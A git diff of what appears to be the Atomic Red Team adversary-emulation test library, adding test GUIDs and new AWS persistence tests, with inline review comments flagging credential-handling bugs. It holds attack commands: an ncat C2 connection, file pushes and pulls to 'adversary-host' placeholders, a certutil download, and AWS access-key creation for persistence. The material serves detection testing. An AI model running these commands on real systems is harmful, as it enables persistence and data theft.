diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml
index 1f5b2ab7..95e3ebc2 100644
--- a/atomics/T1082/T1082.yaml
+++ b/atomics/T1082/T1082.yaml
@@ -121,7 +121,7 @@ atomic_tests:
vbscript:
description: Path to sample script
type: String
- default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs
+ default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
executor:
command: 'cscript #{vbscript}'
name: powershell
diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md
index a50dbcfe..6003c66b 100644
--- a/atomics/T1083/T1083.md
+++ b/atomics/T1083/T1083.md
@@ -24,6 +24,10 @@ all of the data discovery commands.
**Supported Platforms:** Windows
+**auto_generated_guid:** 0e36303b-6762-4500-b003-127743b80ba6
+
+
+
@@ -54,6 +58,10 @@ Find or discover files on the file system. Upon execution, file and folder infor
**Supported Platforms:** Windows
+**auto_generated_guid:** 2158908e-b7ef-4c21-8a83-3ce4dd05a924
+
+
+
@@ -86,10 +94,14 @@ https://perishablepress.com/list-files-folders-recursively-terminal/
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file used to store the results. | path | /tmp/T1083.txt|
@@ -126,10 +138,14 @@ Find or discover files on the file system
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file used to store the results. | path | /tmp/T1083.txt|
diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md
index de48610e..065f757c 100644
--- a/atomics/T1087.001/T1087.001.md
+++ b/atomics/T1087.001/T1087.001.md
@@ -37,10 +37,14 @@ Enumerate all accounts by copying /etc/passwd to another file
**Supported Platforms:** Linux
+**auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt|
@@ -71,10 +75,14 @@ rm -f #{output_file}
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt|
@@ -105,10 +113,14 @@ View accounts with UID 0
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt|
@@ -139,6 +151,10 @@ List opened files by user
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
+
+
+
@@ -163,10 +179,14 @@ Show if a user account has ever logged in remotely
**Supported Platforms:** Linux
+**auto_generated_guid:** 0f0b6a29-08c3-44ad-a30b-47fd996b2110
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt|
@@ -190,7 +210,7 @@ rm -f #{output_file}
##### Description: Check if lastlog command exists on the machine
##### Check Prereq Commands:
```sh
-if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1;
+if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1;
```
##### Get Prereq Commands:
```sh
@@ -209,6 +229,10 @@ Utilize groups and id to enumerate users and groups
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e
+
+
+
@@ -234,6 +258,10 @@ Utilize local utilities to enumerate users and groups
**Supported Platforms:** macOS
+**auto_generated_guid:** 319e9f6c-7a9e-432e-8c62-9385c803b6f2
+
+
+
@@ -263,6 +291,10 @@ Upon exection, multiple enumeration commands will be run and their output displa
**Supported Platforms:** Windows
+**auto_generated_guid:** 80887bec-5a9b-4efc-a81d-f83eb2eb32ab
+
+
+
@@ -291,6 +323,10 @@ Enumerate all accounts via PowerShell. Upon execution, lots of user account and
**Supported Platforms:** Windows
+**auto_generated_guid:** ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b
+
+
+
@@ -323,6 +359,10 @@ Enumerate logged on users. Upon exeuction, logged on users will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** a138085e-bfe5-46ba-a242-74a6fb884af3
+
+
+
@@ -347,6 +387,10 @@ Enumerate logged on users via PowerShell. Upon exeuction, logged on users will b
**Supported Platforms:** Windows
+**auto_generated_guid:** 2bdc42c7-8907-40c2-9c2b-42919a00fe03
+
+
+
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index f39060c1..02fd9e3e 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -36,6 +36,10 @@ Upon exection, multiple enumeration commands will be run and their output displa
**Supported Platforms:** Windows
+**auto_generated_guid:** 6fbc9e68-5ad7-444a-bd11-8bf3136c477e
+
+
+
@@ -61,6 +65,10 @@ Enumerate all accounts via PowerShell. Upon execution, lots of user account and
**Supported Platforms:** Windows
+**auto_generated_guid:** 8b8a6449-be98-4f42-afd2-dedddc7453b2
+
+
+
@@ -87,10 +95,14 @@ Enumerate logged on users. Upon exeuction, logged on users will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** 161dcd85-d014-4f5e-900c-d3eaae82a0f7
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote system to query | String | $env:COMPUTERNAME|
@@ -117,10 +129,14 @@ path will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** 95018438-454a-468c-a0fa-59c800149b59
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adrecon_path | Path of ADRecon.ps1 file | Path | $env:TEMP\ADRecon.ps1|
@@ -144,7 +160,7 @@ Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-
##### Description: ADRecon must exist on disk at specified location (#{adrecon_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}
+if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -164,10 +180,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://social.techne
**Supported Platforms:** Windows
+**auto_generated_guid:** 736b4f53-f400-4c22-855d-1a6b5a551600
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
@@ -186,7 +206,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://social.techne
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -206,10 +226,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.c
**Supported Platforms:** Windows
+**auto_generated_guid:** b95fd967-4e62-4109-b48d-265edfd28c3a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
@@ -228,7 +252,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -248,10 +272,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
+**auto_generated_guid:** e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
@@ -270,7 +298,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -290,10 +318,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
+**auto_generated_guid:** 5e2938fb-f919-47b6-8b29-2f6a1f718e99
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
@@ -312,7 +344,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -331,6 +363,10 @@ This test will enumerate the details of the built-in domain admin account
**Supported Platforms:** Windows
+**auto_generated_guid:** c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
+
+
+
@@ -358,10 +394,14 @@ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain
**Supported Platforms:** Windows
+**auto_generated_guid:** 46f8dbe9-22a5-4770-8513-66119c5be63b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Domain FQDN | String | contoso.com|
| uac_prop | UAC Property to search | String | 524288|
@@ -387,7 +427,7 @@ Try {
}
Catch {
exit 1
-}
+}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1090.001/T1090.001.md b/atomics/T1090.001/T1090.001.md
index 3559cb9e..7e9471af 100644
--- a/atomics/T1090.001/T1090.001.md
+++ b/atomics/T1090.001/T1090.001.md
@@ -23,10 +23,14 @@ Note that this test may conflict with pre-existing system configuration.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
| proxy_scheme | Protocol to proxy (http or https) | string | http|
@@ -61,10 +65,14 @@ Note that this test may conflict with pre-existing system configuration.
**Supported Platforms:** macOS
+**auto_generated_guid:** 648d68c1-8bcd-4486-9abe-71c6655b6a2c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| proxy_server | Proxy server URL (host) | string | 127.0.0.1|
| proxy_port | Proxy server port | string | 8080|
@@ -100,10 +108,14 @@ netsh interface portproxy show all
**Supported Platforms:** Windows
+**auto_generated_guid:** b8223ea9-4be2-44a6-b50a-9657a3d4e72a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| connectaddress | Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer. | string | 127.0.0.1|
| connectport | Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer. | string | 1337|
diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md
index 625bd04f..998ff39b 100644
--- a/atomics/T1095/T1095.md
+++ b/atomics/T1095/T1095.md
@@ -23,10 +23,14 @@ refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-ic
**Supported Platforms:** Windows
+**auto_generated_guid:** 0268e63c-e244-42db-bef7-72a9e59fc1fc
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| server_ip | The IP address of the listening server | string | 127.0.0.1|
@@ -55,10 +59,14 @@ nc -l -p
**Supported Platforms:** Windows
+**auto_generated_guid:** bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| server_port | The port for the C2 connection | integer | 80|
| ncat_exe | The location of ncat.exe | path | $env:TEMP\T1095\nmap-7.80\ncat.exe|
@@ -80,7 +88,7 @@ cmd /c #{ncat_exe} #{server_ip} #{server_port}
##### Description: ncat.exe must be available at specified location (#{ncat_exe})
##### Check Prereq Commands:
```powershell
-if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
+if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -109,10 +117,14 @@ nc -l -p
**Supported Platforms:** Windows
+**auto_generated_guid:** 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| server_ip | The IP address or domain name of the listening server | string | 127.0.0.1|
| server_port | The port for the C2 connection | integer | 80|
diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md
new file mode 100644
index 00000000..c7e59069
--- /dev/null
+++ b/atomics/T1098.001/T1098.001.md
@@ -0,0 +1,66 @@
+# T1098.001 - Additional Cloud Credentials
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098/001)
+Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
+
+Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
+
+In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
+
+## Atomic Tests
+
+- [Atomic Test #1 - AWS - Create Access Key and Secret Key](#atomic-test-1---aws---create-access-key-and-secret-key)
+
+
+
+
+## Atomic Test #1 - AWS - Create Access Key and Secret Key
+Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-491160a31122
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Create new AWS access and secret keys for the user | String | atomicredteam|
+
+
+#### Attack Commands: Run with `sh`!
+
+
+```sh
+aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+cd $PathToAtomicsFolder/T1098.001/bin/
+./aws_secret.sh
+```
+
+#### Cleanup Commands:
+```sh
+access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
+aws iam delete-access-key --access-key-id $access_key --user-name #{username}
+rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: Check if the user exists.
+##### Check Prereq Commands:
+```sh
+aws iam list-users | grep #{username}
+```
+##### Get Prereq Commands:
+```sh
+echo Please run atomic test T1136.003, before running this atomic
+```
+
+
+
+
+
diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml
new file mode 100644
index 00000000..6435b055
--- /dev/null
+++ b/atomics/T1098.001/T1098.001.yaml
@@ -0,0 +1,31 @@
+attack_technique: T1098.001
+display_name: 'Account Manipulation: Additional Cloud Credentials'
+atomic_tests:
+- name: AWS - Create Access Key and Secret Key
+ auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
+ description: |
+ Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ username:
+ description: Create new AWS access and secret keys for the user
+ type: String
+ default: "atomicredteam"
+ dependencies:
+ - description: |
+ Check if the user exists.
+ prereq_command: |
+ aws iam list-users | grep #{username}
+ get_prereq_command: |
+ echo Please run atomic test T1136.003, before running this atomic
+ executor:
+ command: |
+ aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+ cd $PathToAtomicsFolder/T1098.001/bin/
+ ./aws_secret.sh
+ cleanup_command: |
+ access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
+ aws iam delete-access-key --access-key-id $access_key --user-name #{username}
+ rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+ name: sh
\ No newline at end of file
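Review bot: The `aws iam create-access-key` line in the executor writes a live AWS secret access key to `$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds` in plaintext with whatever umask the calling shell has, and if `./aws_secret.sh` fails part-way the file is left behind because the only removal is in cleanup_command. Prefix the redirect with a restrictive mask, e.g. `umask 077; aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds`, so the key is at least not world-readable while it exists. The prereq `aws iam list-users | grep #{username}` is an unanchored substring match (a user named `atomicredteam2` would satisfy it); `aws iam get-user --user-name #{username} >/dev/null 2>&1` tests the exact user. cleanup_command also depends on `jq`, which is not declared in dependencies, so a host without it silently leaves the new key active.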
diff --git a/atomics/T1098.001/bin/aws_secret.sh b/atomics/T1098.001/bin/aws_secret.sh
new file mode 100755
index 00000000..f96e740b
--- /dev/null
+++ b/atomics/T1098.001/bin/aws_secret.sh
@@ -0,0 +1,11 @@
+#! /bin/sh
+echo "Creating Profile in ./aws/credentials"
+access_key=`cat aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
+secret_key=`cat aws_secret.creds| jq -r '.AccessKey.SecretAccessKey'`
+line=`grep -n atomicredteam ~/.aws/credentials | cut -d : -f1 |bc`
+access="$(($line+1))"
+secret="$(($line+2))"
+sed -i '' "${access}s|aws_access_key_id = .*$|aws_access_key_id = $access_key|g" ~/.aws/credentials
+sed -i '' "${secret}s|aws_secret_access_key = .*$|aws_secret_access_key = $secret_key|g" ~/.aws/credentials
+
+
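Review bot: When `grep -n atomicredteam ~/.aws/credentials` finds no match, `line` is empty, `$(($line+1))` evaluates to 1 and `$(($line+2))` to 2, and the two `sed -i` commands silently rewrite lines 1 and 2 of the operator's `~/.aws/credentials`, which in the common layout is the `[default]` profile header and its first key line. The script should refuse to edit when the profile is not found, and should match the `[atomicredteam]` section header rather than any line containing that string. The profile name is also hard-coded here while the YAML exposes a `username` argument, so running the atomic against a different user still edits the `atomicredteam` profile. `sed -i ''` is the BSD/macOS form; on GNU sed the empty argument is taken as the script and the command fails, so the in-place edit is not portable across the Linux hosts this AWS test is likely to be run from. A guarded, portable version:

```sh
#! /bin/sh
set -eu
umask 077
profile="${1:-atomicredteam}"
creds_file="$HOME/.aws/credentials"
access_key=$(jq -r '.AccessKey.AccessKeyId' aws_secret.creds)
secret_key=$(jq -r '.AccessKey.SecretAccessKey' aws_secret.creds)
line=$(grep -n "^\[$profile\]" "$creds_file" | head -n 1 | cut -d : -f1)
if [ -z "$line" ]; then
  echo "Profile [$profile] not found in $creds_file; refusing to edit" >&2
  exit 1
fi
echo "Updating keys for profile [$profile] in $creds_file"
access=$((line + 1))
secret=$((line + 2))
# portable in-place edit: write a temp file, then replace
sed -e "${access}s|aws_access_key_id = .*$|aws_access_key_id = $access_key|" \
    -e "${secret}s|aws_secret_access_key = .*$|aws_secret_access_key = $secret_key|" \
    "$creds_file" > "$creds_file.tmp" && mv "$creds_file.tmp" "$creds_file"
```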
diff --git a/atomics/T1098.004/T1098.004.md b/atomics/T1098.004/T1098.004.md
index 10dae2f0..e3e11db8 100644
--- a/atomics/T1098.004/T1098.004.md
+++ b/atomics/T1098.004/T1098.004.md
@@ -18,6 +18,10 @@ If the user is able to save the same contents in the authorized_keys file, it sh
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc
+
+
+
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
index 221f8feb..d6643fc3 100644
--- a/atomics/T1098/T1098.md
+++ b/atomics/T1098/T1098.md
@@ -8,6 +8,8 @@
- [Atomic Test #2 - Domain Account and Group Manipulate](#atomic-test-2---domain-account-and-group-manipulate)
+- [Atomic Test #3 - AWS - Create a group and add a user to that group](#atomic-test-3---aws---create-a-group-and-add-a-user-to-that-group)
+
@@ -17,6 +19,10 @@ Manipulate Admin Account Name
**Supported Platforms:** Windows
+**auto_generated_guid:** 5598f7cb-cf43-455e-883a-f6008c5d46af
+
+
+
@@ -78,10 +84,14 @@ Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account
**Supported Platforms:** Windows
+**auto_generated_guid:** a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| account_prefix | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. | String | atr-|
@@ -121,7 +131,7 @@ Try {
}
Catch {
exit 1
-}
+}
```
##### Get Prereq Commands:
```powershell
@@ -135,4 +145,55 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+
+
+
+## Atomic Test #3 - AWS - Create a group and add a user to that group
+Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f110a31122
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Name of the AWS group to create | String | atomicredteam|
+
+
+#### Attack Commands: Run with `sh`!
+
+
+```sh
+aws iam create-group --group-name #{username}
+aws iam add-user-to-group --user-name #{username} --group-name #{username}
+```
+
+#### Cleanup Commands:
+```sh
+aws iam remove-user-from-group --user-name #{username} --group-name #{username}
+aws iam delete-group --group-name #{username}
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: Check if the user exists, we can only add a user to a group if the user exists.
+##### Check Prereq Commands:
+```sh
+aws iam list-users | grep #{username}
+```
+##### Get Prereq Commands:
+```sh
+echo Please run atomic test T1136.003, before running this atomic test
+```
+
+
+
+
diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml
index e1093c43..8d72ceb3 100644
--- a/atomics/T1098/T1098.yaml
+++ b/atomics/T1098/T1098.yaml
@@ -101,3 +101,31 @@ atomic_tests:
Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False
name: powershell
+- name: AWS - Create a group and add a user to that group
+ auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
+ description: |
+ Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ username:
+ description: Name of the AWS group to create
+ type: String
+ default: "atomicredteam"
+ dependencies:
+ - description: |
+ Check if the user exists, we can only add a user to a group if the user exists.
+ prereq_command: |
+ aws iam list-users | grep #{username}
+ get_prereq_command: |
+ echo Please run atomic test T1136.003, before running this atomic test
+ executor:
+ command: |
+ aws iam create-group --group-name #{username}
+ aws iam add-user-to-group --user-name #{username} --group-name #{username}
+ cleanup_command: |
+ aws iam remove-user-from-group --user-name #{username} --group-name #{username}
+ aws iam delete-group --group-name #{username}
+ name: sh
+
+
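Review bot: The description says the group is created "to elevate their privilieges", but the executor only runs `create-group` and `add-user-to-group` with no policy attached, so membership in the new empty group grants nothing; either attach an inline policy as part of the technique or reword the description to "create a group and add a user to it (no policy is attached)". The single input is named `username` yet its description reads "Name of the AWS group to create" and the value is used for both `--user-name` and `--group-name`; a separate `group_name` argument (defaulting to the same value) would make the test's intent clear. The `auto_generated_guid` `8822c3b0-d9f9-4daf-a043-49f110a31122` differs from the T1098.001 test's `8822c3b0-d9f9-4daf-a043-491160a31122` by two characters, which looks hand-edited rather than generated; a fresh UUID avoids any risk of a collision in tooling keyed on the GUID. As in T1098.001, the prereq `aws iam list-users | grep #{username}` is a substring match; `aws iam get-user --user-name #{username} >/dev/null 2>&1` is exact.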
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index fc154f30..caef3d08 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -30,6 +30,8 @@
- [Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe](#atomic-test-13---download-a-file-with-windows-defender-mpcmdrunexe)
+- [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download)
+
@@ -39,10 +41,14 @@ Utilize rsync to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Remote path to receive rsync | Path | /tmp/victim-files|
| remote_host | Remote host to copy toward | String | victim-host|
@@ -71,10 +77,14 @@ Utilize rsync to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of folder to copy | Path | /tmp/adversary-rsync/|
| remote_host | Remote host to copy from | String | adversary-host|
@@ -103,10 +113,14 @@ Utilize scp to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Remote path to receive scp | Path | /tmp/victim-files/|
| local_file | Path of file to copy | Path | /tmp/adversary-scp|
@@ -135,10 +149,14 @@ Utilize scp to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive scp | Path | /tmp/victim-files/|
@@ -167,10 +185,14 @@ Utilize sftp to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|
| local_file | Path of file to copy | Path | /tmp/adversary-sftp|
@@ -199,10 +221,14 @@ Utilize sftp to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive sftp | Path | /tmp/victim-files/|
@@ -231,10 +257,14 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach
**Supported Platforms:** Windows
+**auto_generated_guid:** dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
@@ -265,10 +295,14 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify
**Supported Platforms:** Windows
+**auto_generated_guid:** ffd492e3-0455-4518-9fb1-46527c9f241b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
@@ -304,10 +338,14 @@ This technique is used by Qbot malware to download payloads.
**Supported Platforms:** Windows
